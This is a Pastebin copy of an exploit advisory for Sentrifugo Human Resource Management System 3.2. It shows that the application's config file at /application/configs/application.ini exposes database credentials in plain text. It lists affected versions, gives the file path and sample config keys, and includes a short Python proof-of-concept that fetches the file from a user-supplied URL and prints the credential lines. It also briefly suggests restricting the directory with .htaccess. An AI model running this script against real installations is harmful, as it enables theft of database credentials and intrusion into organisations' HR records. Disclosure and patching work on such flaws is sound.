Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################################################################
- # Exploit Title : Sentrifugo Human Resource Management System 3.2 Database Configuration Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 02/05/2019
- # Vendor Homepage : sentrifugo.com
- # Software Download Link : sentrifugo.com/downloadzip/1556734875
- github.com/sapplica/sentrifugo/archive/master.zip
- # Software Affected Versions : 1.1.1 - 1.1.7 - 2.0.1 Beta - 2.1.1 - 3.1.1 and 3.2
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type :
- CWE-16 [ Configuration ]
- CWE-200 [ Information Exposure ]
- CWE-538 [ File and Directory Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ######################################################################
- # Information about Software :
- ***************************
- Sentrifugo is a FREE and powerful Human Resource Management System
- (HRMS) that can be easily configured to meet your organizational needs.
- #####################################################################
- # Impact :
- ***********
- Sentrifugo Human Resource Management System 3.2 configuration file may potentially
- disclose sensitive information to remote attackers.
- The username and password of the database may be obtained trough the "application.ini" file.
- This is going to have an impact on confidentiality, integrity, and availability.
- The configuration file unintentionally stored in /application/configs/application.ini
- HTTP requests consisting of a single character will cause the software to disclose sensitive
- configuration information, including the password/database to the administrative web interface.
- This file is installed, by default, with world readable and possibly world writeable permissions enabled.
- This may have some potentially serious consequences as the configuration file
- also stores password information in plain text.
- This issue occurs because access controls on configuration files are not properly set.
- An attacker can exploit this issue to retrieve potentially sensitive information.
- Attackers can access config file via URL request. This may aid in further attacks.
- The access to the /configs directory should be restricted with an adequate
- countermeasure by the use of a .htaccess file.
- * The product stores sensitive information in files or directories that are accessible to actors
- outside of the intended control sphere.
- * An information exposure is the intentional or unintentional disclosure of information to an actor
- that is not explicitly authorized to have access to that information.
- Installation Guide for Windows - Linux - MacOSX => sentrifugo.com/installation-guide
- #####################################################################
- # Database Configuration File Disclosure Exploit :
- *******************************************
- /application/configs/application.ini
- Information :
- *************
- resources.db.adapter = PDO_MYSQL
- resources.db.params.host = SENTRIFUGO_HOST
- resources.db.params.username = SENTRIFUGO_USERNAME
- resources.db.params.password = SENTRIFUGO_PASSWORD
- resources.db.params.dbname = SENTRIFUGO_DBNAME
- resources.db.isDefaultTableAdapter = true
- Exploit - Proof of Concept :
- **************************
- #!/usr/bin/python
- import string
- import re
- from urllib2 import Request, urlopen
- disc = "/application/configs/application.ini"
- url = raw_input ("URL: ")
- req = Request(url+disc)
- rta = urlopen(req)
- print "Result"
- html = rta.read()
- rdo = str(re.findall("resources.*=*", html))
- print rdo
- exit
- #####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement